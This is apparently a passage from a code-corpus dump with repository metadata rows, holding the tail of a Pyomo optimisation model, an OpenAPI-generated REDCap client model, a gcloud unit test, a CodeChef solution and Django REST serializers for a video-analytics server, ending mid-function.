                        - 0.0104868*m.i16 + 0.0238532*m.i17 - 0.0104023*m.i18 + 0.0013017*m.i19 - 0.0474684*m.i20
                        - 0.00693531*m.i21 - 0.00667252*m.i22 - 0.0063525*m.i23 - 0.0205131*m.i24 - 0.00639281*m.i25
                        - 0.00085931*m.i26 - 0.0202418*m.i27 - 0.0104094*m.i28 - 0.00728791*m.i29 - 0.0650481*m.i30
                        + 0.00379685*m.i31 - 0.00873524*m.i32 - 0.0191879*m.i33 - 0.0262863*m.i34 - 0.0148439*m.i35
                        - 0.0185713*m.i36 - 0.0097821*m.i37 - 0.0169321*m.i38 - 0.0126042*m.i39 + 0.0147787*m.i40
                        - 0.0212007*m.i41 - 0.0136018*m.i42 - 0.00404129*m.i43 - 0.01093*m.i44 - 0.0138447*m.i45
                        - 0.00281865*m.i46 - 0.0168853*m.i47 - 0.00610726*m.i48 - 0.00313898*m.i49 - 0.031707*m.i50
                        + 0.00048868*m.i51 - 0.0135947*m.i52 - 0.00571196*m.i53 - 0.0158213*m.i54 - 0.00551418*m.i55
                        + 7.4592E-5*m.i56 - 0.00372748*m.i57 + 0.00092127*m.i58 - 0.00743836*m.i59 + 0.00559625*m.i60
                        - 0.0170773*m.i61 - 0.0321089*m.i62 - 0.0230835*m.i63 - 0.0133205*m.i64 - 0.00788571*m.i65
                        - 0.0339356*m.i66 + 0.00227885*m.i67 - 0.010863*m.i68 - 0.0171333*m.i69 - 0.00515196*m.i70
                        - 0.0244616*m.i71 - 0.00205996*m.i72 + 0.00281383*m.i73 - 0.00173674*m.i74 - 0.0179568*m.i75
                        - 0.00659808*m.i76 - 0.0108104*m.i77 - 0.00557398*m.i78 - 0.0427583*m.i79 + 0.00183802*m.i80
                        - 0.0178204*m.i81 - 0.00328309*m.i82 - 0.0207823*m.i83 - 0.0110875*m.i84 - 0.0128258*m.i85
                        - 0.00442073*m.i86 - 0.00903049*m.i87 + 0.0203439*m.i88 - 0.0223604*m.i89 - 0.0149007*m.i90
                        - 0.0193623*m.i91 - 0.013037*m.i92 - 0.00297365*m.i93 - 0.0112456*m.i94 - 0.00469496*m.i95
                        - 0.00682019*m.i96 - 0.00327006*m.i97 - 0.0258562*m.i98 - 0.0215847*m.i99 - 0.0231142*m.i100
                        >= 0)

# c3 and c4 share one positive coefficient vector (presumably per-unit prices)
# and together enforce a two-sided "budget" window on the same weighted sum:
# c3 is the lower bound (>= 2000).
m.c3 = Constraint(expr= 52.59*m.i1 + 28.87*m.i2 + 29.19*m.i3 + 46.55*m.i4 + 24.26*m.i5 + 42.53*m.i6 + 40.53*m.i7
                        + 79.56*m.i8 + 108.9*m.i9 + 79.06*m.i10 + 20.15*m.i11 + 35.64*m.i12 + 39.55*m.i13 + 14.32*m.i14
                        + 26.41*m.i15 + 62.48*m.i16 + 254.3*m.i17 + 32.42*m.i18 + 24.84*m.i19 + 10.1*m.i20 + 21.2*m.i21
                        + 40.25*m.i22 + 17.32*m.i23 + 60.92*m.i24 + 54.73*m.i25 + 78.62*m.i26 + 49.24*m.i27
                        + 68.19*m.i28 + 50.3*m.i29 + 3.83*m.i30 + 18.27*m.i31 + 59.67*m.i32 + 12.21*m.i33 + 38.09*m.i34
                        + 71.72*m.i35 + 23.6*m.i36 + 70.71*m.i37 + 56.98*m.i38 + 34.47*m.i39 + 10.23*m.i40 + 59.19*m.i41
                        + 58.61*m.i42 + 445.29*m.i43 + 131.69*m.i44 + 34.24*m.i45 + 43.11*m.i46 + 25.18*m.i47 + 28*m.i48
                        + 19.43*m.i49 + 14.33*m.i50 + 28.41*m.i51 + 74.5*m.i52 + 36.54*m.i53 + 38.99*m.i54 + 43.15*m.i55
                        + 199.55*m.i56 + 59.07*m.i57 + 123.55*m.i58 + 20.55*m.i59 + 66.72*m.i60 + 37.95*m.i61
                        + 27.62*m.i62 + 23.21*m.i63 + 36.09*m.i64 + 23.09*m.i65 + 46.54*m.i66 + 67.89*m.i67
                        + 34.83*m.i68 + 11.96*m.i69 + 45.77*m.i70 + 32.91*m.i71 + 77.37*m.i72 + 21.46*m.i73
                        + 53.11*m.i74 + 14.29*m.i75 + 61.13*m.i76 + 32.79*m.i77 + 59.84*m.i78 + 6.59*m.i79 + 14.06*m.i80
                        + 55.29*m.i81 + 33.33*m.i82 + 4.24*m.i83 + 23.21*m.i84 + 47.85*m.i85 + 48.99*m.i86 + 57.46*m.i87
                        + 28.87*m.i88 + 24.6*m.i89 + 22.26*m.i90 + 28.31*m.i91 + 26.67*m.i92 + 48.1*m.i93 + 28.01*m.i94
                        + 64.85*m.i95 + 25.54*m.i96 + 31.47*m.i97 + 18.31*m.i98 + 35.06*m.i99 + 8.06*m.i100 >= 2000)

# c4: upper bound (<= 2200) of the identical weighted sum constrained in c3.
m.c4 = Constraint(expr= 52.59*m.i1 + 28.87*m.i2 + 29.19*m.i3 + 46.55*m.i4 + 24.26*m.i5 + 42.53*m.i6 + 40.53*m.i7
                        + 79.56*m.i8 + 108.9*m.i9 + 79.06*m.i10 + 20.15*m.i11 + 35.64*m.i12 + 39.55*m.i13 + 14.32*m.i14
                        + 26.41*m.i15 + 62.48*m.i16 + 254.3*m.i17 + 32.42*m.i18 + 24.84*m.i19 + 10.1*m.i20 + 21.2*m.i21
                        + 40.25*m.i22 + 17.32*m.i23 + 60.92*m.i24 + 54.73*m.i25 + 78.62*m.i26 + 49.24*m.i27
                        + 68.19*m.i28 + 50.3*m.i29 + 3.83*m.i30 + 18.27*m.i31 + 59.67*m.i32 + 12.21*m.i33 + 38.09*m.i34
                        + 71.72*m.i35 + 23.6*m.i36 + 70.71*m.i37 + 56.98*m.i38 + 34.47*m.i39 + 10.23*m.i40 + 59.19*m.i41
                        + 58.61*m.i42 + 445.29*m.i43 + 131.69*m.i44 + 34.24*m.i45 + 43.11*m.i46 + 25.18*m.i47 + 28*m.i48
                        + 19.43*m.i49 + 14.33*m.i50 + 28.41*m.i51 + 74.5*m.i52 + 36.54*m.i53 + 38.99*m.i54 + 43.15*m.i55
                        + 199.55*m.i56 + 59.07*m.i57 + 123.55*m.i58 + 20.55*m.i59 + 66.72*m.i60 + 37.95*m.i61
                        + 27.62*m.i62 + 23.21*m.i63 + 36.09*m.i64 + 23.09*m.i65 + 46.54*m.i66 + 67.89*m.i67
                        + 34.83*m.i68 + 11.96*m.i69 + 45.77*m.i70 + 32.91*m.i71 + 77.37*m.i72 + 21.46*m.i73
                        + 53.11*m.i74 + 14.29*m.i75 + 61.13*m.i76 + 32.79*m.i77 + 59.84*m.i78 + 6.59*m.i79 + 14.06*m.i80
                        + 55.29*m.i81 + 33.33*m.i82 + 4.24*m.i83 + 23.21*m.i84 + 47.85*m.i85 + 48.99*m.i86 + 57.46*m.i87
                        + 28.87*m.i88 + 24.6*m.i89 + 22.26*m.i90 + 28.31*m.i91 + 26.67*m.i92 + 48.1*m.i93 + 28.01*m.i94
                        + 64.85*m.i95 + 25.54*m.i96 + 31.47*m.i97 + 18.31*m.i98 + 35.06*m.i99 + 8.06*m.i100 <= 2200)
| [
"[email protected]"
] | |
fa2af2256e992f5dea361ca6dc8422c6d97e35d1 | 43ab33b2f50e47f5dbe322daa03c86a99e5ee77c | /rcc/models/study_events.py | 73804683abfe9626a9ff78782d4aa06520a3ae77 | [] | no_license | Sage-Bionetworks/rcc-client | c770432de2d2950e00f7c7bd2bac22f3a81c2061 | 57c4a621aecd3a2f3f9faaa94f53b2727992a01a | refs/heads/main | 2023-02-23T05:55:39.279352 | 2021-01-21T02:06:08 | 2021-01-21T02:06:08 | 331,486,099 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,338 | py | # coding: utf-8
"""
nPhase REST Resource
REDCap REST API v.2 # noqa: E501
The version of the OpenAPI document: 2.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from rcc.configuration import Configuration
class StudyEvents(object):
    """Container model for a collection of ``StudyEvent`` objects.

    NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    # Maps each attribute name to its declared OpenAPI type, used by the
    # (de)serialization machinery.
    openapi_types = {
        'study_event': 'list[StudyEvent]'
    }

    # Maps each attribute name to the key used in the JSON wire format.
    attribute_map = {
        'study_event': 'studyEvent'
    }

    def __init__(self, study_event=None, local_vars_configuration=None):  # noqa: E501
        """StudyEvents - a model defined in OpenAPI"""  # noqa: E501
        self.local_vars_configuration = (
            Configuration()
            if local_vars_configuration is None
            else local_vars_configuration)

        self._study_event = None
        self.discriminator = None

        if study_event is not None:
            self.study_event = study_event

    @property
    def study_event(self):
        """Gets the study_event of this StudyEvents.  # noqa: E501

        :return: The study_event of this StudyEvents.  # noqa: E501
        :rtype: list[StudyEvent]
        """
        return self._study_event

    @study_event.setter
    def study_event(self, study_event):
        """Sets the study_event of this StudyEvents.

        :param study_event: The study_event of this StudyEvents.  # noqa: E501
        :type: list[StudyEvent]
        """
        self._study_event = study_event

    def to_dict(self):
        """Returns the model properties as a dict"""

        def serialize(value):
            # Recursively convert nested models (anything exposing to_dict)
            # while passing primitives through untouched.
            if isinstance(value, list):
                return [item.to_dict() if hasattr(item, "to_dict") else item
                        for item in value]
            if hasattr(value, "to_dict"):
                return value.to_dict()
            if isinstance(value, dict):
                return {key: val.to_dict() if hasattr(val, "to_dict") else val
                        for key, val in value.items()}
            return value

        return {attr: serialize(getattr(self, attr))
                for attr in self.openapi_types}

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        return (isinstance(other, StudyEvents)
                and self.to_dict() == other.to_dict())

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self.__eq__(other)
| [
"[email protected]"
] | |
07025217cb00bf91a6ba23c519d15a6c2bff30ad | 82a9077bcb5a90d88e0a8be7f8627af4f0844434 | /google-cloud-sdk/lib/tests/unit/api_lib/compute/instances/ops_agents/exceptions_test.py | 6315b0e3b6f56b2dd728bee1157215665d21febe | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | piotradamczyk5/gcloud_cli | 1ae2553595e569fad6ce84af62b91a7ee5489017 | 384ece11040caadcd64d51da74e0b8491dd22ca3 | refs/heads/master | 2023-01-01T23:00:27.858583 | 2020-10-21T04:21:23 | 2020-10-21T04:21:23 | 290,238,061 | 0 | 0 | null | 2020-10-19T16:43:36 | 2020-08-25T14:31:00 | Python | UTF-8 | Python | false | false | 1,861 | py | # -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit Tests for ops_agents.exceptions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute.instances.ops_agents import exceptions
from tests.lib import test_case
import six
# Canonical validation failure messages used to build the expected aggregated
# output asserted in the test below.
ERROR_MESSAGE_1 = 'At most one agent with type [logging] is allowed.'
ERROR_MESSAGE_2 = (
    'The agent version [1] is not allowed. Expected values: [latest], '
    '[current-major], or anything in the format of '
    '[MAJOR_VERSION.MINOR_VERSION.PATCH_VERSION] or [MAJOR_VERSION.*.*].')
ERROR_MESSAGE_3 = (
    'An agent can not be pinned to the specific version [5.3.1] when '
    '[enable-autoupgrade] is set to true for that agent.')
# PolicyValidationMultiError is expected to join child messages with ' | '.
MULTI_ERROR_MESSAGE = '{} | {} | {}'.format(
    ERROR_MESSAGE_1, ERROR_MESSAGE_2, ERROR_MESSAGE_3)
class PolicyValidationMultiErrorTest(test_case.TestCase):
  """Tests for PolicyValidationMultiError message aggregation."""

  def testErrorMessage(self):
    """The wrapped errors' messages are joined with ' | '."""
    messages = (ERROR_MESSAGE_1, ERROR_MESSAGE_2, ERROR_MESSAGE_3)
    multi_error = exceptions.PolicyValidationMultiError(
        [exceptions.PolicyValidationError(m) for m in messages])
    self.assertEqual(MULTI_ERROR_MESSAGE, six.text_type(multi_error))
| [
"[email protected]"
] | |
80ffd316b9bbc8a682e4c8e9e842d3020e7a8472 | 545536daea315e31e01e388326e21a317f73dc6c | /Guddu on a Date.py | f390db81dd0b921ac0e786f7bc984075e63bfca0 | [] | no_license | calkikhunt/CODE_CHEF | 3cd4db7d2231dc31a045645da08c52a78edda6b6 | 81bb90368822bc77e70582ab3eae1a4244e6c80f | refs/heads/master | 2022-04-18T08:43:23.900118 | 2020-01-29T09:31:35 | 2020-01-29T09:31:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | t=int(input())
# For each of t test cases, read n and print the n-th term of a sequence that
# starts at 19 and advances by 9, 18 or 19 depending on the candidate's digits.
# The terms counted all have a digit sum divisible by 10 (19, 28, ..., 91, ...).
for i in range(t):
    ctrcopy=19
    n=int(input())
    ptr=0
    # NOTE(review): if ctrcopy's digit sum is ever NOT divisible by 10, none of
    # the three branches below runs, ctrcopy never changes, and this loop spins
    # forever. Example: 91 takes the +9 branch to 100 (digit sum 1), so any
    # n >= 10 appears to hang — verify the stepping rules against the problem.
    while ptr<(n):
        ctr=ctrcopy
        check=str(ctrcopy)
        doublecheck=str(ctrcopy+19)
        sumdigi=0
        # Compute the decimal digit sum of the current candidate.
        while ctr>0:
            use=ctr%10
            ctr=ctr//10
            sumdigi+=use
        # Candidate counts; next step is +9 when the last digit is non-zero.
        if sumdigi%10==0 and check[len(check)-1]!='0':
            ptr+=1
            if ptr>=n:
                break
            ctrcopy+=9
        # Last digit zero: step +19 when adding 19 keeps the leading digit...
        elif sumdigi%10==0 and check[len(check)-1]=='0' and check[0]==doublecheck[0]:
            ptr+=1
            if ptr>=n:
                break
            ctrcopy+=19
        # ...and +18 when it would change it.
        elif sumdigi%10==0 and check[len(check)-1]=='0' and check[0]!=doublecheck[0]:
            ptr+=1
            if ptr>=n:
                break
            ctrcopy+=18
    print(ctrcopy)
| [
"[email protected]"
] | |
dac834b379278ddf5e2bc0403e4ac406d9aea1e4 | 4f6ad7cdea2cab5fe89df34f6e5158e4b77837c3 | /server/dvaapp/serializers.py | 746c7a13a61f2e3b5f38663e2f1bf6dacfb29986 | [
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] | permissive | ginusxiao/DeepVideoAnalytics | 7194d83b518976340cd834e4e6a8ab9b164a2e3f | 52c38c729b1a114cc46e641943e3e28a68428e25 | refs/heads/master | 2020-03-18T21:40:31.811272 | 2018-05-29T10:16:20 | 2018-05-29T10:16:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,156 | py | from rest_framework import serializers, viewsets
from django.contrib.auth.models import User
from models import Video, Frame, Region, DVAPQL, QueryResults, TEvent, IndexEntries, \
Tube, Segment, Label, VideoLabel, FrameLabel, RegionLabel, \
SegmentLabel, TubeLabel, TrainedModel, Retriever, SystemState, QueryRegion,\
QueryRegionResults, Worker, TrainingSet
import os, json, logging, glob
from collections import defaultdict
from django.conf import settings
from StringIO import StringIO
from rest_framework.parsers import JSONParser
class UserSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for Django auth users.

    The password field is write-only: it is accepted on create/update but is
    never echoed back in API responses.
    """
    class Meta:
        model = User
        fields = ('url', 'username', 'email', 'password')
        extra_kwargs = {
            'password': {'write_only': True},
        }
class VideoSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every Video field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = Video
        fields = '__all__'
class RetrieverSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every Retriever field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = Retriever
        fields = '__all__'
class TrainedModelSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every TrainedModel field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = TrainedModel
        fields = '__all__'
class TrainingSetSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every TrainingSet field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = TrainingSet
        fields = '__all__'
class LabelSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every Label field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = Label
        fields = '__all__'
class FrameLabelSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every FrameLabel field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = FrameLabel
        fields = '__all__'
class RegionLabelSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every RegionLabel field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = RegionLabel
        fields = '__all__'
class SegmentLabelSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every SegmentLabel field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = SegmentLabel
        fields = '__all__'
class VideoLabelSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every VideoLabel field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = VideoLabel
        fields = '__all__'
class TubeLabelSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every TubeLabel field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = TubeLabel
        fields = '__all__'
class FrameLabelExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) FrameLabel serializer used for export files."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = FrameLabel
        fields = '__all__'
class RegionLabelExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) RegionLabel serializer used for export files."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = RegionLabel
        fields = '__all__'
class SegmentLabelExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) SegmentLabel serializer used for export files."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = SegmentLabel
        fields = '__all__'
class VideoLabelExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) VideoLabel serializer used for export files."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = VideoLabel
        fields = '__all__'
class WorkerSerializer(serializers.HyperlinkedModelSerializer):
    """Minimal Worker serializer exposing only queue_name and id."""
    class Meta:
        model = Worker
        fields = ('queue_name', 'id')
class TubeLabelExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) TubeLabel serializer used for export files."""
    class Meta:
        model = TubeLabel
        fields = '__all__'
class FrameSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked Frame serializer adding a computed media_url field."""
    media_url = serializers.SerializerMethodField()
    def get_media_url(self,obj):
        """URL of the frame JPEG under MEDIA_URL/<video_id>/frames/."""
        return "{}{}/frames/{}.jpg".format(settings.MEDIA_URL,obj.video_id,obj.frame_index)
    class Meta:
        model = Frame
        fields = ('url','media_url', 'video', 'frame_index', 'keyframe', 'w', 'h', 't',
                  'name', 'subdir', 'id', 'segment_index')
class SegmentSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked Segment serializer adding a computed media_url field."""
    media_url = serializers.SerializerMethodField()
    def get_media_url(self,obj):
        """URL of the segment MP4 under MEDIA_URL/<video_id>/segments/."""
        return "{}{}/segments/{}.mp4".format(settings.MEDIA_URL,obj.video_id,obj.segment_index)
    class Meta:
        model = Segment
        fields = ('video','segment_index','start_time','end_time','metadata',
                  'frame_count','start_index','start_frame','end_frame','url','media_url', 'id')
class RegionSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked Region serializer adding a computed media_url field."""
    media_url = serializers.SerializerMethodField()
    def get_media_url(self,obj):
        """URL of the region crop JPEG, or None if the crop was never materialized."""
        if obj.materialized:
            return "{}{}/regions/{}.jpg".format(settings.MEDIA_URL,obj.video_id,obj.pk)
        else:
            return None
    class Meta:
        model = Region
        fields = ('url','media_url','region_type','video','user','frame','event','frame_index',
                  'segment_index','text','metadata','full_frame','x','y','h','w',
                  'polygon_points','created','object_name','confidence','materialized','png', 'id')
class TubeSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every Tube field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = Tube
        fields = '__all__'
class QueryRegionSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every QueryRegion field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = QueryRegion
        fields = '__all__'
class SystemStateSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every SystemState field."""
    class Meta:
        model = SystemState
        fields = '__all__'
class QueryResultsSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every QueryResults field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = QueryResults
        fields = '__all__'
class QueryRegionResultsSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every QueryRegionResults field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = QueryRegionResults
        fields = '__all__'
class QueryResultsExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) QueryResults serializer used for export files."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = QueryResults
        fields = '__all__'
class QueryRegionResultsExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) QueryRegionResults serializer used for export files."""
    class Meta:
        model = QueryRegionResults
        fields = '__all__'
class QueryRegionExportSerializer(serializers.ModelSerializer):
    """QueryRegion export serializer nesting its per-region results."""
    query_region_results = QueryRegionResultsExportSerializer(source='queryregionresults_set', read_only=True, many=True)
    class Meta:
        model = QueryRegion
        fields = ('id','region_type','query','event','text','metadata','full_frame','x','y','h','w','polygon_points',
                  'created','object_name','confidence','png','query_region_results')
class TaskExportSerializer(serializers.ModelSerializer):
    """TEvent export serializer nesting the task's query results and regions."""
    query_results = QueryResultsExportSerializer(source='queryresults_set', read_only=True, many=True)
    query_regions = QueryRegionExportSerializer(source='queryregion_set', read_only=True, many=True)
    class Meta:
        model = TEvent
        fields = ('started','completed','errored','worker','error_message','video','operation','queue',
                  'created','start_ts','duration','arguments','task_id','parent','parent_process',
                  'imported','query_results', 'query_regions', 'id')
class TEventSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every TEvent field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = TEvent
        fields = '__all__'
class IndexEntriesSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing every IndexEntries field; id is read-only."""
    id = serializers.ReadOnlyField()
    class Meta:
        model = IndexEntries
        fields = '__all__'
class RegionExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) Region serializer used for export files."""
    class Meta:
        model = Region
        fields = '__all__'
class FrameExportSerializer(serializers.ModelSerializer):
    """Frame export serializer nesting the frame's regions."""
    region_list = RegionExportSerializer(source='region_set', read_only=True, many=True)
    class Meta:
        model = Frame
        fields = ('region_list', 'video', 'frame_index', 'keyframe', 'w', 'h', 't',
                  'name', 'subdir', 'id', 'segment_index')
class IndexEntryExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) IndexEntries serializer used for export files."""
    class Meta:
        model = IndexEntries
        fields = '__all__'
class TEventExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) TEvent serializer used for export files."""
    class Meta:
        model = TEvent
        fields = '__all__'
class TubeExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) Tube serializer used for export files."""
    class Meta:
        model = Tube
        fields = '__all__'
class SegmentExportSerializer(serializers.ModelSerializer):
    """Flat (non-hyperlinked) Segment serializer used for export files."""
    class Meta:
        model = Segment
        fields = '__all__'
class DVAPQLSerializer(serializers.HyperlinkedModelSerializer):
    """DVAPQL process serializer nesting its tasks and the query image URL."""
    tasks = TaskExportSerializer(source='tevent_set', read_only=True, many=True)
    query_image_url = serializers.SerializerMethodField()
    def get_query_image_url(self,obj):
        """URL of the uploaded query PNG; only QUERY processes have one."""
        if obj.process_type == DVAPQL.QUERY:
            return "{}queries/{}.png".format(settings.MEDIA_URL,obj.uuid)
        else:
            return None
    class Meta:
        model = DVAPQL
        fields =('process_type','query_image_url','created', 'user', 'uuid', 'script', 'tasks',
                 'results_metadata', 'results_available', 'completed','id')
class VideoExportSerializer(serializers.ModelSerializer):
    """Full-fidelity Video serializer used when exporting a video: nests
    frames, segments, index entries, events, tubes and every label relation."""
    frame_list = FrameExportSerializer(source='frame_set', read_only=True, many=True)
    segment_list = SegmentExportSerializer(source='segment_set', read_only=True, many=True)
    index_entries_list = IndexEntryExportSerializer(source='indexentries_set', read_only=True, many=True)
    event_list = TEventExportSerializer(source='tevent_set', read_only=True, many=True)
    tube_list = TubeExportSerializer(source='tube_set', read_only=True, many=True)
    frame_label_list = FrameLabelExportSerializer(source='framelabel_set', read_only=True, many=True)
    region_label_list = RegionLabelExportSerializer(source='regionlabel_set', read_only=True, many=True)
    tube_label_list = TubeLabelExportSerializer(source='tubelabel_set', read_only=True, many=True)
    segment_label_list = SegmentLabelExportSerializer(source='segmentlabel_set', read_only=True, many=True)
    video_label_list = VideoLabelExportSerializer(source='videolabel_set', read_only=True, many=True)
    class Meta:
        model = Video
        fields = ('name', 'length_in_seconds', 'height', 'width', 'metadata', 'frames', 'created', 'description',
                  'uploaded', 'dataset', 'uploader', 'segments', 'url','frame_list', 'segment_list',
                  'event_list', 'tube_list', 'index_entries_list', 'frame_label_list', 'region_label_list',"stream",
                  'tube_label_list', 'segment_label_list', 'video_label_list')
def serialize_video_labels(v):
    """Collect the distinct labels attached to video *v* through any label
    relation (frame, video, segment, region, tube) as a list of dicts."""
    label_models = (FrameLabel, VideoLabel, SegmentLabel, RegionLabel, TubeLabel)
    label_index = {}
    for model in label_models:
        for record in model.objects.filter(video_id=v.pk):
            # First occurrence wins; later relations with the same label are ignored.
            if record.label_id not in label_index:
                label_index[record.label_id] = {'id': record.label.id,
                                                'name': record.label.name,
                                                'set': record.label.set}
    return label_index.values()
def import_frame_json(f, frame_index, event_id, video_id, w, h):
    """Build an unsaved Frame plus its unsaved Region objects from a JSON dict."""
    frame = Frame()
    frame.video_id = video_id
    frame.event_id = event_id
    frame.w = w
    frame.h = h
    frame.frame_index = frame_index
    frame.name = f['path']
    regions = [import_region_json(r, frame_index, video_id, event_id)
               for r in f.get('regions', [])]
    return frame, regions
def import_region_json(r, frame_index, video_id, event_id, segment_index=None, frame_id=None):
    """Build an unsaved Region from a JSON dict.

    Bug fix: segment_index and frame_id were previously tested for truthiness,
    so a legitimate value of 0 was silently dropped; compare against None
    instead (both parameters default to None).
    """
    dr = Region()
    dr.frame_index = frame_index
    dr.video_id = video_id
    dr.event_id = event_id
    dr.object_name = r['object_name']
    dr.region_type = r.get('region_type', Region.ANNOTATION)
    dr.full_frame = r.get('full_frame', False)
    if segment_index is not None:
        dr.segment_index = segment_index
    if frame_id is not None:
        dr.frame_id = frame_id
    dr.x = r.get('x', 0)
    dr.y = r.get('y', 0)
    dr.w = r.get('w', 0)
    dr.h = r.get('h', 0)
    dr.confidence = r.get('confidence', 0.0)
    # Normalize a missing/empty/None 'text' to the empty string.
    if r.get('text', None):
        dr.text = r['text']
    else:
        dr.text = ""
    dr.metadata = r.get('metadata', None)
    return dr
def create_event(e, v):
    """Translate an exported event dict *e* into an unsaved TEvent bound to
    video *v*; missing keys fall back to neutral defaults."""
    event = TEvent()
    event.imported = True
    event.started = e.get('started', False)
    event.start_ts = e.get('start_ts', None)
    event.completed = e.get('completed', False)
    event.errored = e.get('errored', False)
    event.error_message = e.get('error_message', "")
    event.video_id = v.pk
    event.operation = e.get('operation', "")
    event.created = e['created']
    # Older exports stored the runtime under 'seconds' instead of 'duration'.
    event.duration = e.get('seconds', e.get('duration', -1)) if 'seconds' in e \
        else e.get('duration', -1)
    event.arguments = e.get('arguments', {})
    event.task_id = e.get('task_id', "")
    return event
class VideoImporter(object):
    """Imports a previously exported video (metadata JSON plus files under
    *root_dir*) into the database, remapping the exported primary keys of
    frames, regions, events, segments, labels and tubes to the newly created
    rows.

    Fixes over the previous revision: the bare ``except:`` in
    convert_regions_files now catches only OSError, and the Python-2-only
    ``raise X, "msg"`` statements use call syntax (valid on both 2 and 3).
    """
    def __init__(self, video, json, root_dir):
        self.video = video
        self.json = json
        self.root = root_dir
        # Maps from exported (old) primary keys to freshly created ones.
        self.region_to_pk = {}
        self.frame_to_pk = {}
        self.event_to_pk = {}
        self.segment_to_pk = {}
        self.label_to_pk = {}
        self.tube_to_pk = {}
        # Fallback indexer shasums for exports that predate 'indexer_shasum'.
        self.name_to_shasum = {'inception': '48b026cf77dfbd5d9841cca3ee550ef0ee5a0751',
                               'facenet': '9f99caccbc75dcee8cb0a55a0551d7c5cb8a6836',
                               'vgg': '52723231e796dd06fafd190957c8a3b5a69e009c'}
    def import_video(self):
        """Entry point: restore video metadata, files and all related rows."""
        if self.video.name is None or not self.video.name:
            self.video.name = self.json['name']
        self.video.frames = self.json['frames']
        self.video.height = self.json['height']
        self.video.width = self.json['width']
        self.video.segments = self.json.get('segments', 0)
        self.video.stream = self.json.get('stream', False)
        self.video.dataset = self.json['dataset']
        self.video.description = self.json['description']
        self.video.metadata = self.json['metadata']
        self.video.length_in_seconds = self.json['length_in_seconds']
        self.video.save()
        if not self.video.dataset:
